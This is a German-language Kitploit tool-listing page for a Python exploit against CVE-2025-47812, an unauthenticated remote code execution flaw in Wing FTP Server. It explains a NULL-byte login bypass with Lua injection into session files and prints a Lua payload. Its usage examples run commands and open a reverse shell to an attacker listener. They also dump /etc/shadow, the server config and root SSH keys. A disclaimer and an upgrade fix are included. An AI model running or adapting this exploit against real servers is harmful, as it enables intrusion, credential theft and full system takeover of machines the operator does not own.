Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-47812 — RCE for WingFTP v4.7.3 | Kitploit
Tools/GitHubGitHub/popyue/cve-2025-47812
ExploitationWeb Application ExploitationPenetration TestingAuthenticationRemote Access ToolPayload Development
GitHubpopyue/cve-2025-47812

CVE-2025-47812

RCE for WingFTP v4.7.3

Repository anzeigen
vor 5 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-47812 — Wing FTP Server Unauthenticated RCE

root@kitploit:~
 ██╗    ██╗██╗███╗   ██╗ ██████╗     ███████╗████████╗██████╗
 ██║    ██║██║████╗  ██║██╔════╝     ██╔════╝╚══██╔══╝██╔══██╗
 ██║ █╗ ██║██║██╔██╗ ██║██║  ███╗    █████╗     ██║   ██████╔╝
 ██║███╗██║██║██║╚██╗██║██║   ██║    ██╔══╝     ██║   ██╔═══╝
 ╚███╔███╔╝██║██║ ╚████║╚██████╔╝    ██║        ██║   ██║
  ╚══╝╚══╝ ╚═╝╚═╝  ╚═══╝ ╚═════╝     ╚═╝        ╚═╝   ╚═╝

Übersicht

FeldDetail
CVECVE-2025-47812
BetroffenWing FTP Server <= 7.4.3
BehobenWing FTP Server 7.4.4
CVSS10.0 (Kritisch)
Authentifizierung erforderlichKeine (anonymer Login ausreichend)
Erlangte Berechtigungroot (Linux) / NT AUTHORITY\SYSTEM (Windows)
Entdeckt vonJulien Ahrens (@MrTuxracer) — rcesecurity.com

Schwachstellenbeschreibung

Die Weboberfläche von Wing FTP Server ist anfällig für einen zweistufigen Remote-Code-Ausführungsangriff vor der Authentifizierung.

Stufe 1 — NULL-Byte-Authentifizierungsumgehung + Lua-Code-Injection

Die Funktion c_CheckUser() im Wing FTP-Binärprogramm verwendet intern strlen(), welches den Benutzernamen-String beim ersten NULL-Byte (\x00) abschneidet. Das bedeutet, dass ein Benutzername wie anonymous%00<arbitrary_data> die Authentifizierung passiert, solange anonymous (oder ein anderer gültiger Benutzer) existiert.

Nach erfolgreicher Authentifizierung ruft loginok.html rawset(_SESSION, "username", username) mit dem vollständigen, unbereinigten POST-Parameter auf — einschließlich aller Daten nach dem NULL-Byte. Die Sitzung wird dann über SessionModule.save() in eine Lua-Skriptdatei auf der Festplatte serialisiert.

Da die Serialisierungsfunktion Zeichenfolgenwerte in [[...]] Lua-Langstring-Literale ohne jegliche Bereinigung verpackt, beendet das Injizieren von ]] in den Benutzernamen das Stringliteral vorzeitig, sodass beliebiger Lua-Code an die Sitzungsdatei angehängt werden kann.

Payload-Struktur:

root@kitploit:~
anonymous\x00]]
local h = io.popen("id")
local r = h:read("*a")
h:close()
print(r)
--

Das abschließende -- kommentiert das ]] aus, das Wing FTP nach dem Wert anhängt.

Stufe 2 — Auslösung über authentifizierten Endpunkt

Die Sitzungsdatei (benannt nach dem Wert des UID-Cookies) ist ein Lua-Skript, das bei jedem Zugriff auf einen authentifizierten Endpunkt über loadfile() + f() ausgeführt wird. Das Senden von POST /dir.html mit dem UID-Cookie führt das injizierte Lua aus und gibt die Befehlsausgabe im Antworttext vor dem <?xml-Inhalt zurück.


Voraussetzungen

  • Python 3.10+
  • requests, urllib3
root@kitploit:~
pip install -r requirements.txt

Verwendung

root@kitploit:~
usage: CVE-2025-47812 [-h] [-U USER] [-P PASS] [--vhost HOST] [--timeout N]
                      [--verify-ssl]
                      [--cmd CMD | --shell | --revshell | --dump]
                      [--lhost IP] [--lport PORT] [--listen]
                      target

Beispiele

root@kitploit:~
# Single command
python3 CVE-2025-47812.py http://ftp.target.com --cmd "id"
python3 CVE-2025-47812.py http://ftp.target.com --cmd "cat /etc/passwd"

# Target by IP (Wing FTP uses virtual-host routing — supply hostname with --vhost)
python3 CVE-2025-47812.py http://10.10.10.10 --vhost ftp.target.com --cmd "id"

# Interactive pseudo-shell
python3 CVE-2025-47812.py http://ftp.target.com --shell

# Reverse shell (start nc listener separately)
python3 CVE-2025-47812.py http://ftp.target.com --revshell --lhost 10.10.14.5 --lport 4444

# Reverse shell with built-in listener
python3 CVE-2025-47812.py http://ftp.target.com --revshell --listen --lhost 10.10.14.5 --lport 4444

# Dump sensitive files (/etc/passwd, /etc/shadow, Wing.cfg, root SSH key)
python3 CVE-2025-47812.py http://ftp.target.com --dump

# With non-anonymous credentials
python3 CVE-2025-47812.py http://ftp.target.com -U ftpuser -P secret --cmd "whoami"

Behebung

Führen Sie ein Upgrade von Wing FTP Server auf Version 7.4.4 oder höher durch.


Referenzen

  • Original-Writeup: https://www.rcesecurity.com/2025/06/what-the-null-wing-ftp-server-rce-cve-2025-47812/
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-47812
  • Verwandt: CVE-2025-47811 (übermäßig großzügige Dienstberechtigungen), CVE-2025-47813 (Pfadoffenlegung durch zu langen UID-Cookie)

Haftungsausschluss

Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Penetrationstests bereitgestellt. Die Verwendung dieses Exploits gegen Systeme, die Ihnen nicht gehören oder für die Sie keine ausdrückliche schriftliche Genehmigung zum Testen haben, ist illegal und unethisch. Der Autor übernimmt keine Haftung für Missbrauch.

Tool herunterladen